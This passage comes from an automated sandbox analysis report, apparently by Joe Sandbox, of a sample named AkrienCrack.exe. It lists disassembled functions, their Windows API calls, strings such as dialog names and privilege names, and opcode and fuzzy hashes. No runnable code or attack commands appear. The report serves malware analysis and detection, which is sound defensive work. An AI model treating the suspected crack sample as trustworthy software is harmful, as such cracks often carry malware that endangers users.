                • Part of subcall function 00B59E1C: LockResource.KERNEL32(00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E64
              Strings
              Similarity
              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
              • String ID: ]
              • API String ID: 142272564-3352871620
              • Opcode ID: 186f9b3109e3f1b5fbb1da3ea24591ae712adeb1865828d19ca925e8813441c8
              • Instruction ID: 5bc860882fe220ab0dabcb6e99ca2151a12df816b236b0e862d0a545a340399c
              • Opcode Fuzzy Hash: 186f9b3109e3f1b5fbb1da3ea24591ae712adeb1865828d19ca925e8813441c8
              • Instruction Fuzzy Hash: D001C032540215A7CB2167689C07B7FBBFAEB82B53F1902D5BD00B7291DE718C1D96A2
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • EndDialog.USER32(?,00000001), ref: 00B5CCDB
              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B5CCF1
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B5CD05
              • SetDlgItemTextW.USER32(?,00000068), ref: 00B5CD14
              Strings
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: RENAMEDLG
              • API String ID: 445417207-3299779563
              • Opcode ID: c434179e73ed2dd4730a977a6bce0d2210594fce7e5bbbf742a670c6e5e98ebd
              • Instruction ID: 44c27cbcea1fa15cacbb6d0035a881c176bd051b54fb0cb7074442863cd3b183
              • Opcode Fuzzy Hash: c434179e73ed2dd4730a977a6bce0d2210594fce7e5bbbf742a670c6e5e98ebd
              • Instruction Fuzzy Hash: C80128322843107EE5218F689D09F573FEEEB5A703F1004D1F745A70E0CBA5990987A5
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B67573,00000000,?,00B67513,00000000,00B7BAD8,0000000C,00B6766A,00000000,00000002), ref: 00B675E2
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B675F5
              • FreeLibrary.KERNEL32(00000000,?,?,?,00B67573,00000000,?,00B67513,00000000,00B7BAD8,0000000C,00B6766A,00000000,00000002), ref: 00B67618
              Strings
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 1cf80c820034f5c2c3ef71217b8e81fdd08e16f3986824ab9d84149990575065
              • Instruction ID: 42f014db0343e69e9bb9215f5e362f09122b0540c1a7ffeb3ee4a9a9a4437ce3
              • Opcode Fuzzy Hash: 1cf80c820034f5c2c3ef71217b8e81fdd08e16f3986824ab9d84149990575065
              • Instruction Fuzzy Hash: A8F04430A54618BBDB159F54DC09BDDBFF9EF04B15F0040A8F809A7160DF749E84DA54
              APIs
                • Part of subcall function 00B50085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B500A0
                • Part of subcall function 00B50085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B4EB86,Crypt32.dll,00000000,00B4EC0A,?,?,00B4EBEC,?,?,?), ref: 00B500C2
              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B4EB92
              • GetProcAddress.KERNEL32(00B881C0,CryptUnprotectMemory), ref: 00B4EBA2
              Strings
              Similarity
              • API ID: AddressProc$DirectoryLibraryLoadSystem
              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
              • API String ID: 2141747552-1753850145
              • Opcode ID: 79ac72cbaa309cdef456d34cf468fd2d562aa0209675dacdbcb1859426f7e5e4
              • Instruction ID: c22521237912cf654c20e1ca8e2abd6fa0d6620418087a8147957ce4956b36bb
              • Opcode Fuzzy Hash: 79ac72cbaa309cdef456d34cf468fd2d562aa0209675dacdbcb1859426f7e5e4
              • Instruction Fuzzy Hash: 15E04F704047519ECB209F349858B42BAE4AF14B01B04C89DE5EAE3190DAB4D584AB50
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: b646ab4d1f492e4bf44ca693d752bf06a1c32c959582b9f62069621e1c944918
              • Instruction ID: 4dc455afb285405cf7a456607eee848e78fc8711b3ed7ca0ff943d84c7e6a1dc
              • Opcode Fuzzy Hash: b646ab4d1f492e4bf44ca693d752bf06a1c32c959582b9f62069621e1c944918
              • Instruction Fuzzy Hash: 8741C132A403049BDB24DF78C881A5EB7E6EF89718B1545E8E919EB341EB35ED05CB80
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 00B6B619
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6B63C
                • Part of subcall function 00B68518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B6B662
              • _free.LIBCMT ref: 00B6B675
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B6B684
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: bb62312da0fea3511affe7bc730c1dbf877d4a18155a0a7972950fd65be9fa48
              • Instruction ID: ea15efcca1b56e22dd1181ae6b734bc8f37f3893a18db82519d1b92012fc3ea5
              • Opcode Fuzzy Hash: bb62312da0fea3511affe7bc730c1dbf877d4a18155a0a7972950fd65be9fa48
              • Instruction Fuzzy Hash: D7018472602215BF63211676AC9CC7BAAFDDEC6FA031502A9F905D3115DF688E8191B1
              APIs
              • GetLastError.KERNEL32(?,?,?,00B6895F,00B685FB,?,00B68FD3,00000001,00000364,?,00B63713,00000050,?,00B80EE8,00000200), ref: 00B6902E
              • _free.LIBCMT ref: 00B69063
              • _free.LIBCMT ref: 00B6908A
              • SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B69097
              • SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B690A0
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 82d66ceccfd7b88b416b8bad94a9c9780c031745f61a79fbe3811f88b819ce7b
              • Instruction ID: 9e39bebb792ef52b28e28b7dbf264b647928f1362a8f238d51594283a083e6c4
              • Opcode Fuzzy Hash: 82d66ceccfd7b88b416b8bad94a9c9780c031745f61a79fbe3811f88b819ce7b
              • Instruction Fuzzy Hash: 0C012836505B006B933267746CC5A2B26DEDFC177172001E5F619E3252EF7CCC016160
              APIs
                • Part of subcall function 00B50A41: ResetEvent.KERNEL32(?), ref: 00B50A53
                • Part of subcall function 00B50A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B50A67
              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B5078F
              • CloseHandle.KERNEL32(?,?), ref: 00B507A9
              • DeleteCriticalSection.KERNEL32(?), ref: 00B507C2
              • CloseHandle.KERNEL32(?), ref: 00B507CE
              • CloseHandle.KERNEL32(?), ref: 00B507DA
                • Part of subcall function 00B5084E: WaitForSingleObject.KERNEL32(?,000000FF,00B50A78,?), ref: 00B50854
                • Part of subcall function 00B5084E: GetLastError.KERNEL32(?), ref: 00B50860
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
              • String ID:
              • API String ID: 1868215902-0
              • Opcode ID: 3f25996911305b4c113556e9b44ea2c1824b80576bbb4125113a5ea69b8f5df7
              • Instruction ID: 9a67e05baddc2b5c77e7d3221fe768a569e0c40570a7c4509154cdc92d0c9d69
              • Opcode Fuzzy Hash: 3f25996911305b4c113556e9b44ea2c1824b80576bbb4125113a5ea69b8f5df7
              • Instruction Fuzzy Hash: 6C01B571440704EFC721AF69DC84FC6BBE9FB49B11F004599F55E83160CB756A88DBA1
              APIs
              • _free.LIBCMT ref: 00B6BF28
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B6BF3A
              • _free.LIBCMT ref: 00B6BF4C
              • _free.LIBCMT ref: 00B6BF5E
              • _free.LIBCMT ref: 00B6BF70
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 084994833db14665416626c0a06fa3ba8937d62b13f2d67c06cd65ee8d70eeb7
              • Instruction ID: 62e530cc4163fc03dc6a11ac07eb3d76f03314b188e88eacfd0b19ba661d0adb
              • Opcode Fuzzy Hash: 084994833db14665416626c0a06fa3ba8937d62b13f2d67c06cd65ee8d70eeb7
              • Instruction Fuzzy Hash: 29F01232505201AB9630EB68FEC6C1AB3EAFE0471076449D9F01CD7A21CF38FCC08A54
              APIs
              • _free.LIBCMT ref: 00B6807E
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B68090
              • _free.LIBCMT ref: 00B680A3
              • _free.LIBCMT ref: 00B680B4
              • _free.LIBCMT ref: 00B680C5
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 8684422ae5bd6c4ea36892400ae57370bd5a403f072b5b653c93da1bf82a3c80
              • Instruction ID: 21540d9718304119252ba1b493601fb7a6c3c63e0b4c034ba60ccd462e99f4be
              • Opcode Fuzzy Hash: 8684422ae5bd6c4ea36892400ae57370bd5a403f072b5b653c93da1bf82a3c80
              • Instruction Fuzzy Hash: 33F054B58026258BD7916F1DBC834057BA6FB1A720B184F96F414D7B70CF3984919FD1
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\AkrienCrack.exe,00000104), ref: 00B676FD
              • _free.LIBCMT ref: 00B677C8
              • _free.LIBCMT ref: 00B677D2
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
              • API String ID: 2506810119-794829201
              • Opcode ID: 6e730799fb657fcdf41f5d28ab329eed21961c6247b16c0276ffd248decbea4d
              • Instruction ID: a37732b80cfbb37bdadabb580387ba5a8d1c22374802987d77cd4bd4df2b29f2
              • Opcode Fuzzy Hash: 6e730799fb657fcdf41f5d28ab329eed21961c6247b16c0276ffd248decbea4d
              • Instruction Fuzzy Hash: 2431AE71A49218AFDB21DF99DC85DAEBBFCEB85714F1441E6E80497210DE784E40CBA1
              APIs
              • __EH_prolog.LIBCMT ref: 00B47579
                • Part of subcall function 00B43B3D: __EH_prolog.LIBCMT ref: 00B43B42
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B47640
                • Part of subcall function 00B47BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B47C04
                • Part of subcall function 00B47BF5: GetLastError.KERNEL32 ref: 00B47C4A
                • Part of subcall function 00B47BF5: CloseHandle.KERNEL32(?), ref: 00B47C59
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
              • String ID: SeRestorePrivilege$SeSecurityPrivilege
              • API String ID: 3813983858-639343689
              • Opcode ID: 6a1c4bf469d74b33bb6624686cf8c202c2d334aa4d2f1e0e55ecba64e0796b66
              • Instruction ID: e1ec1254f8469879e3d47e0d31c6c7d827dabc9a1930a227bb04d7e7b9aa07dd
              • Opcode Fuzzy Hash: 6a1c4bf469d74b33bb6624686cf8c202c2d334aa4d2f1e0e55ecba64e0796b66
              • Instruction Fuzzy Hash: 01318F71948248AEDF20EB68DC01BEE7BE9EF15754F0040D9F849A7192DF708B48DBA1
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • EndDialog.USER32(?,00000001), ref: 00B5A4B8
              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B5A4CD
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B5A4E2
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: ASKNEXTVOL
              • API String ID: 445417207-3402441367
              • Opcode ID: 953a48096d061ef25de35b463c3982178ff4a392f1f644b19afdc3fa237e1c2e
              • Instruction ID: 4599fa44fc0163a812c80c01ef392a08e06d5d4a61d90570aadf6b7c6699a6c6
              • Opcode Fuzzy Hash: 953a48096d061ef25de35b463c3982178ff4a392f1f644b19afdc3fa237e1c2e
              • Instruction Fuzzy Hash: B11196326442007FDA219F98DC4AF667BE9EB4B702F1046D4FB41B72A0CBA19949D727
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: __fprintf_l_strncpy
              • String ID: $%s$@%s
              • API String ID: 1857242416-834177443
              • Opcode ID: f1795afde4c0a427d67f0a5b50fec1d7dc01f95b4f5a4ea0964ab49b82b50908
              • Instruction ID: d40b80312337e452bafda66d73dff63439bcae813e159425a50f1ab13a944826
              • Opcode Fuzzy Hash: f1795afde4c0a427d67f0a5b50fec1d7dc01f95b4f5a4ea0964ab49b82b50908
              • Instruction Fuzzy Hash: 1E216372540208ABDF21DEA4CC46FEE7BE8EF04700F0445A2FE15961A1E3B1EB59EB51
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • EndDialog.USER32(?,00000001), ref: 00B5A9DE
              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B5A9F6
              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B5AA24
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: GETPASSWORD1
              • API String ID: 445417207-3292211884
              • Opcode ID: d67786fa2321713559657cc01dd3f314a3acd1e6f6b7906b040bb91b65e65881
              • Instruction ID: 3274c164f8c21f5cf658f608fb7919e7da4d4554551ec9a2aa2a4fdc57a62d5c
              • Opcode Fuzzy Hash: d67786fa2321713559657cc01dd3f314a3acd1e6f6b7906b040bb91b65e65881
              • Instruction Fuzzy Hash: F51108329401287ADB219F689D49FFB3BECEB4A712F0001E1FE45B7091C6619E59D672
              APIs
              • _swprintf.LIBCMT ref: 00B4B51E
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • _wcschr.LIBVCRUNTIME ref: 00B4B53C
              • _wcschr.LIBVCRUNTIME ref: 00B4B54C
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _wcschr$__vswprintf_c_l_swprintf
              • String ID: %c:\
              • API String ID: 525462905-3142399695
              • Opcode ID: 6ce5f1931e181b01c759cfdd15c398409e38e0c2640bcec354d23c9ddda64ee9
              • Instruction ID: f117397674981966e99005aa7fe2838bbbfbfc7528709155a5771c684739aae9
              • Opcode Fuzzy Hash: 6ce5f1931e181b01c759cfdd15c398409e38e0c2640bcec354d23c9ddda64ee9
              • Instruction Fuzzy Hash: 3001215350431176C7309B759C92D2BF7ECDEB5760B544856FA45C7041FB34D650D2A2
              APIs
              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B4ABC5,00000008,?,00000000,?,00B4CB88,?,00000000), ref: 00B506F3
              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B4ABC5,00000008,?,00000000,?,00B4CB88,?,00000000), ref: 00B506FD
              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B4ABC5,00000008,?,00000000,?,00B4CB88,?,00000000), ref: 00B5070D
              Strings
              • Thread pool initialization failed., xrefs: 00B50725
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Create$CriticalEventInitializeSectionSemaphore
              • String ID: Thread pool initialization failed.
              • API String ID: 3340455307-2182114853
              • Opcode ID: befee7f7ae136a6edaf7fa333fdf026b357c031348350fe8731168dce1ed3ade
              • Instruction ID: f3cc6f72327a41ce3d64cd54cc9181c44a31b26f459eaf4497c9bc33a6af997b
              • Opcode Fuzzy Hash: befee7f7ae136a6edaf7fa333fdf026b357c031348350fe8731168dce1ed3ade
              • Instruction Fuzzy Hash: 2111A0B1540709AFC3206F66C884AA7FBECEB99745F10486EF1DA83200DA716A84CB50
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID:
              • String ID: RENAMEDLG$REPLACEFILEDLG
              • API String ID: 0-56093855
              • Opcode ID: 2c8c35f01211cc4a3e1d82bf04d452e436e9db65ba07447b4a75ab3218fc45b0
              • Instruction ID: 7780334316edfc27cfdc327d39bb4864ed733d84c467feda435bc9466047d22b
              • Opcode Fuzzy Hash: 2c8c35f01211cc4a3e1d82bf04d452e436e9db65ba07447b4a75ab3218fc45b0
              • Instruction Fuzzy Hash: DA017C72A00246AFDB219F59ED45F563BEAE709382B0445E1FD0993330CF719858EBA1
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
